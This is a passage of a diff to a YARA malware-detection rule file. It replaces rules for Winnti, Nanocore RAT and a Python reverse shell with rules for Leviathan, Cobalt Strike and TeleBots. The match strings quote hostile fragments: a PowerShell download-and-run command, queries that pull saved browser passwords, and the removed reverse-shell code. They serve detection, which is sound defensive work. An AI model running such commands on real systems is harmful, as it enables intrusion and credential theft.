+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "afcdf79be1557326c854b6e20cb900a7" or pe.imphash ( ) == "fc6683d30d9f25244a50fd5357825e79" or pe.imphash ( ) == "2c5f2513605e48f2d8ea5440a870cb9e" or pe.imphash ( ) == "0b5552dccd9d0a834cea55c0c8fc05be" ) and pe.number_of_signatures == 0
+}
+rule SIGNATURE_BASE_Sedll_Javascript_Decryptor : FILE
+{
+	meta:
+		description = "Detects SeDll - DLL is used for decrypting and executing another JavaScript backdoor such as Orz"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca3c186c-0286-5b9b-9585-7680336c8c3d"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/VbvJtL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_ms_report_201701.yar#L10-L24"
+		id = "8fafd139-0c4f-5c51-af8f-b4917d2d69b0"
+		date = "2017-10-18"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "715892268431bf76cf9bf0bdbeaf4129befdc590b5b2dcae479d95dfe77561a4"
+		logic_hash = "26ef61d8bb1764dddd951526902fb510fbacc8b808fe99ddee1956dc8b59bd1d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2c9882854a60c624ecf6b62b6c7cc7ed04cf4a29814aa5ed1f1a336854697641"
+		hash1 = "146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4"
 
 	strings:
-		$s1 = "mciqtz.exe" fullword wide
-		$s2 = "knat9y7m" fullword ascii
+		$x1 = "SEDll_Win32.dll" fullword ascii
+		$x2 = "regsvr32 /s \"%s\" DR __CIM__" wide
+		$s1 = "WScriptW" fullword ascii
+		$s2 = "IWScript" fullword ascii
+		$s3 = "%s\\%s~%d" fullword wide
+		$s4 = "PutBlockToFileWW" fullword ascii
+		$s5 = "CheckUpAndDownWW" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Winnti_Nlaifsvc : FILE
+rule SIGNATURE_BASE_Leviathan_Cobaltstrike_Sample_1 : FILE
 {
 	meta:
-		description = "Winnti sample - file NlaifSvc.dll"
+		description = "Detects Cobalt Strike sample from Leviathan report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2bfcad4-9762-5f2a-88cc-e8cdc648e710"
-		date = "2017-01-25"
+		id = "e29072d8-b4ea-5e94-8a1c-0a1baec5f423"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/VbvJtL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_ms_report_201701.yar#L26-L42"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L33-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7268c79baf37174e04b391ae42cdd6014f17478c5b89d0c7b8042eb839324f87"
+		logic_hash = "9ebc8c2f8ddba302e0fbde69e27986236053a3d31c50cf3a2f979a9ebb90907f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5"
+		hash1 = "5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362"
 
 	strings:
-		$x1 = "cracked by ximo" ascii
-		$s1 = "Yqrfpk" fullword ascii
-		$s2 = "IVVTOC" fullword ascii
+		$x1 = "a54c81.dll" fullword ascii
+		$x2 = "%d is an x64 process (can't inject x86 content)" fullword ascii
+		$x3 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$s2 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$s3 = "could not run command (w/ token) because of its length of %d bytes!" fullword ascii
+		$s4 = "could not write to process memory: %d" fullword ascii
+		$s5 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+		$s6 = "Could not connect to pipe (%s): %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_CVE_2015_1701_Taihou : CVE_2015_1701 FILE
+rule SIGNATURE_BASE_Mockdll_Gen : FILE
 {
 	meta:
-		description = "CVE-2015-1701 compiled exploit code"
+		description = "Detects MockDll - regsvr DLL loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58250e17-aa46-5451-ae6d-18fb4030f8df"
-		date = "2015-05-13"
+		id = "904a0649-27e7-5024-aa6b-ddb23bba6202"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/W4nU0q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_1701.yar#L2-L28"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L57-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d230e036c303642c40bdf83be2b097f6e447a7e7d4292c495179edbae8a4124c"
-		score = 70
+		logic_hash = "cbe7b816199d251bfdc751f46bd95da6f0447ebd56f564619d24eb08bbd4a2c7"
+		score = 75
 		quality = 85
-		tags = "CVE-2015-1701, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"
-		hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"
-		hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"
-		hash4 = "d9989a46d590ebc792f14aa6fec30560dfe931b1"
-		hash5 = "63d1d33e7418daf200dc4660fc9a59492ddd50d9"
+		hash1 = "bfc5c6817ff2cc4f3cd40f649e10cc9ae1e52139f35fdddbd32cb4d221368922"
+		hash2 = "80b931ab1798d7d8a8d63411861cee07e31bb9a68f595f579e11d3817cfc4aca"
 
 	strings:
-		$s3 = "VirtualProtect" fullword
-		$s4 = "RegisterClass"
-		$s5 = "LoadIcon"
-		$s6 = "PsLookupProcessByProcessId" fullword ascii
-		$s7 = "LoadLibraryExA" fullword ascii
-		$s8 = "gSharedInfo" fullword
-		$w1 = "user32.dll" wide
-		$w2 = "ntdll" wide
+		$x1 = "mock_run_ini_Win32.dll" fullword ascii
+		$x2 = "mock_run_ini_x64.dll" fullword ascii
+		$s1 = "RealCmd=%s %s" fullword ascii
+		$s2 = "MockModule=%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of ( $s* ) and 1 of ( $w* )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_EXPL_CVE_2021_1647_Apr21_1 : CVE_2021_1647 FILE
+rule SIGNATURE_BASE_Vbscript_Favicon_File : FILE
 {
 	meta:
-		description = "Detects samples that exploit CVE-2021-1647"
-		author = "Arkbird_SOLG"
-		id = "ecce018e-1bee-5374-b6c8-984c2a8c2530"
-		date = "2021-05-04"
-		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_1647.yar#L2-L18"
+		description = "VBScript cloaked as Favicon file used in Leviathan incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "84147d4e-d062-5ba4-8019-6bf4b72c36c6"
+		date = "2017-10-18"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L77-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0e1809ba10e5ea624e1c4d2e948c928c590b40e6315def8cb1216930ead8579"
+		logic_hash = "5b89ea916adf6864c8b1cb7cd7ee6d74ea47bf17a0b03cc513046f8d260ae376"
 		score = 75
 		quality = 85
-		tags = "CVE-2021-1647, FILE"
-		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
-		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
-		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
-		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
+		tags = "FILE"
+		hash1 = "39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36"
 
 	strings:
-		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
-		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
+		$x1 = "myxml = '<?xml version=\"\"1.0\"\" encoding=\"\"UTF-8\"\"?>';myxml = myxml +'<root>" ascii
+		$x2 = ".Run \"taskkill /im mshta.exe" ascii
+		$x3 = "<script language=\"VBScript\">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :" ascii
+		$s1 = ".ExpandEnvironmentStrings(\"%ALLUSERSPROFILE%\") &" ascii
+		$s2 = ".ExpandEnvironmentStrings(\"%temp%\") & " ascii
 
 	condition:
-		filesize > 10KB and filesize < 10000KB and all of them
+		filesize < 100KB and ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_Reverse_Connect_TCP_PTY_Shell : FILE
+rule SIGNATURE_BASE_SUSP_Two_Byte_XOR_PE_And_MZ : FILE
 {
 	meta:
-		description = "Detects reverse connect TCP PTY shell"
-		author = "Jeff Beley"
-		id = "a9a90d67-774b-5b32-97c0-d7e06763f2e9"
-		date = "2019-10-19"
-		modified = "2023-12-05"
-		reference = "https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_backconnect.py"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_python_pty_shell.yar#L1-L16"
+		description = "Look for 2 byte xor of a PE starting at offset 0"
+		author = "Wesley Shields <wxs@atarininja.org>"
+		id = "ddb87194-bafb-597d-9184-fe4fe3c5ce8d"
+		date = "2021-10-11"
+		modified = "2025-11-03"
+		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xored_pe.yar#L1-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b92077f9ff775ae3f8166f47a32aaa872fcbf7fcefc3789e5411388aac5403a"
-		score = 75
+		logic_hash = "8a43ff9ec966df72ef35fb9ba9bbbd6f8b0f3761669bb91dc5919645d6327174"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "cae9833292d3013774bdc689d4471fd38e4a80d2d407adf9fa99bc8cde3319bf"
 
-	strings:
-		$s1 = "os.dup2(s.fileno(),1)" fullword ascii
-		$s2 = "pty.spawn(\"/bin/\")" fullword ascii
-		$s3 = "os.putenv(\"HISTFILE\",'/dev/null')" fullword ascii
-		$s4 = "socket.socket(socket.AF_INET, socket.SOCK_STREAM)" fullword ascii
+	condition:
+		uint16( 0 ) != 0x5a4d and uint32( ( uint16( 0x3c ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) | ( ( uint16( 0x3e ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) << 16 ) ) ^ ( ( uint16( 0 ) ^ 0x5a4d ) | ( ( uint16( 0 ) ^ 0x5a4d ) << 16 ) ) == 0x00004550
+}
+rule SIGNATURE_BASE_SUSP_Four_Byte_XOR_PE_And_MZ : FILE
+{
+	meta:
+		description = "Look for 4 byte xor of a PE starting at offset 0"
+		author = "Wesley Shields <wxs@atarininja.org>"
+		id = "d7b4b462-dfde-5d1f-8039-63522436c15f"
+		date = "2021-10-11"
+		modified = "2025-11-03"
+		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xored_pe.yar#L14-L27"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "28230cd3c1d1da97a98df09243593eb59b57f376f651d5f22c3ea5903f0f73e4"
+		score = 60
+		quality = 85
+		tags = "FILE"
 
 	condition:
-		filesize < 1KB and 2 of them
+		uint16( 0 ) != 0x5a4d and uint32( 0x28 ) != 0x00000000 and uint32( 0x28 ) == uint32( 0x2c ) and uint32( uint32( 0x3c ) ^ uint32( 0x28 ) ) ^ uint32( 0x28 ) == 0x00004550
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Gen_1 : FILE
+rule SIGNATURE_BASE_Telebots_Intercepterng : FILE
 {
 	meta:
-		description = "Detetcs the Nanocore RAT and similar malware"
+		description = "Detects TeleBots malware - IntercepterNG"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b007e0ce-e64f-5027-95ff-d178383e3b59"
-		date = "2016-04-22"
+		id = "f4d48eb6-8235-534d-a32f-7f2711b96e9d"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L8-L26"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "09fab3ef1b4ca9092fd69fb09c4ef759946fcb5b84161441bff797bb4009ed00"
-		score = 70
+		logic_hash = "cbf0d44d871ec471e891fb909612f58263ec0b0c702f87875f6e027362409318"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"
+		hash1 = "5f9fef7974d37922ac91365588fbe7b544e13abbbde7c262fe30bade7026e118"
 
 	strings:
-		$x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii
-		$x2 = "RunPE1" fullword ascii
-		$x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii
-		$x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii
-		$x5 = "Monitorinjection" fullword ascii
+		$s1 = "Usage: %s iface_num\\dump [mode] [w] [-gw] [-t1 ip]" fullword ascii
+		$s2 = "Target%d found: %s - [%.2X-%.2X-%.2X-%.2X-%.2X-%.2X]" fullword ascii
+		$s3 = "3: passwords + files, no arp poison" fullword ascii
+		$s4 = "IRC Joining Keyed Channel intercepted" fullword ascii
+		$s5 = "-tX - set target ip" fullword ascii
+		$s6 = "w - save session to .pcap dump" fullword ascii
+		$s7 = "example: %s 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5" fullword ascii
+		$s8 = "ORACLE8 DES Authorization intercepted" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Gen_2 : FILE
+rule SIGNATURE_BASE_Telebots_Killdisk_1 : FILE
 {
 	meta:
-		description = "Detetcs the Nanocore RAT"
+		description = "Detects TeleBots malware - KillDisk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "74124961-3b0e-5808-b495-90437d3a5999"
-		date = "2016-04-22"
+		id = "111fc6bc-b790-51b9-81b7-a4716bb0aee9"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L28-L44"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L32-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "23b3d149012fb8395b7daa2ecaf3ee66fdeac352ac94d632d76e52df2c6e8ea6"
-		score = 100
+		logic_hash = "e70d324c408bae1bb42b16f19cd0e6b87e8228c7480d571fef5266eee5695fd2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"
+		hash1 = "8246f709efa922a485e1ca32d8b0d10dc752618e8b3fce4d3dd58d10e4a6a16d"
 
 	strings:
-		$x1 = "NanoCore.ClientPluginHost" fullword ascii
-		$x2 = "IClientNetworkHost" fullword ascii
-		$x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii
+		$s1 = "Plug-And-Play Support Service" fullword wide
+		$s2 = " /c \"echo Y|" fullword wide
+		$s3 = "-set=06.12.2016#09:30 -est=1410" fullword ascii
+		$s4 = "%d.%d.%d#%d:%d" fullword ascii
+		$s5 = " /T /C /G " fullword wide
+		$s6 = "[-] > %ls" fullword wide
+		$s7 = "[+] > %ls" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Sample_1 : FILE
+rule SIGNATURE_BASE_Telebots_Killdisk_2 : FILE
 {
 	meta:
-		description = "Detetcs a certain Nanocore RAT sample"
+		description = "Detects TeleBots malware - KillDisk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "381d3caf-77de-544c-869c-4d9f0cae148f"
-		date = "2016-04-22"
+		id = "7797187f-c94b-5323-ae43-2dc001f0b481"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L46-L62"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L53-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c74e5fe7e9d4dd7f032281b0e617f2355bc5844acf04a8ffbfd42165c7d9b8e4"
+		logic_hash = "e4ae09a226c4eecae18e685423ef30b3776be518609f89a078c647fe8ee00f19"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"
+		hash1 = "26173c9ec8fd1c4f9f18f89683b23267f6f9d116196ed15655e9cb453af2890e"
 
 	strings:
-		$x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide
-		$x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii
-		$x3 = "popthatkitty.Resources.resources" fullword ascii
+		$s1 = "Plug-And-Play Support Service" fullword wide
+		$s2 = " /c \"echo Y|" fullword wide
+		$s3 = "%d.%d.%d#%d:%d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Sample_2 : FILE
+rule SIGNATURE_BASE_Telebots_Credraptor_Password_Stealer : FILE
 {
 	meta:
-		description = "Detetcs a certain Nanocore RAT sample"
+		description = "Detects TeleBots malware - CredRaptor Password Stealer"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81f6771a-29a3-5fa0-8d24-ea717d3c5251"
-		date = "2016-04-22"
-		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L64-L80"
+		id = "f594a946-13b4-5179-9029-a0730634d55f"
+		date = "2016-12-14"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L70-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "505176b7320e95c652f0b6fdc6fadc3d16ff30115263862ba61209fa2fb82a2d"
+		logic_hash = "ed884cb7643a61109f87e2887bed7ddb838c73bce28812b76c35bb807629e116"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"
+		hash1 = "50b990f6555055a265fde98324759dbc74619d6a7c49b9fd786775299bf77d26"
 
 	strings:
-		$s1 = "U4tSOtmpM" fullword ascii
-		$s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" wide
-		$s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii
+		$s1 = "C:\\Documents and Settings\\Administrator\\Desktop\\GetPAI\\Out\\IE.pdb" fullword ascii
+		$s2 = "SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins" fullword ascii
+		$s3 = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS" fullword ascii
+		$s4 = ".\\PAI\\IEforXPpasswords.txt" ascii
+		$s5 = "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$s6 = "Opera old version credentials" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Feb18_1 : FILE
+rule SIGNATURE_BASE_Telebots_VBS_Backdoor_1 : FILE
 {
 	meta:
-		description = "Detects Nanocore RAT"
+		description = "Detects TeleBots malware - VBS Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6db0c8a7-8c31-58a6-8732-de6663fec16b"
-		date = "2018-02-19"
+		id = "2b711f66-8ec5-5b9a-a762-7e6668c821c9"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "Internal Research - T2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L92-L115"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L90-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "824fd7304fb298ced69811078aa2dd23d7116554cffb8b6e4b690fccc93a4caf"
+		logic_hash = "4ff4963058674cf71c123af74c0947da2edf3b5e2622261d14200f406dbe2992"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c"
-
-	strings:
-		$x1 = "NanoCore Client.exe" fullword ascii
-		$x2 = "NanoCore.ClientPluginHost" fullword ascii
-		$s1 = "PluginCommand" fullword ascii
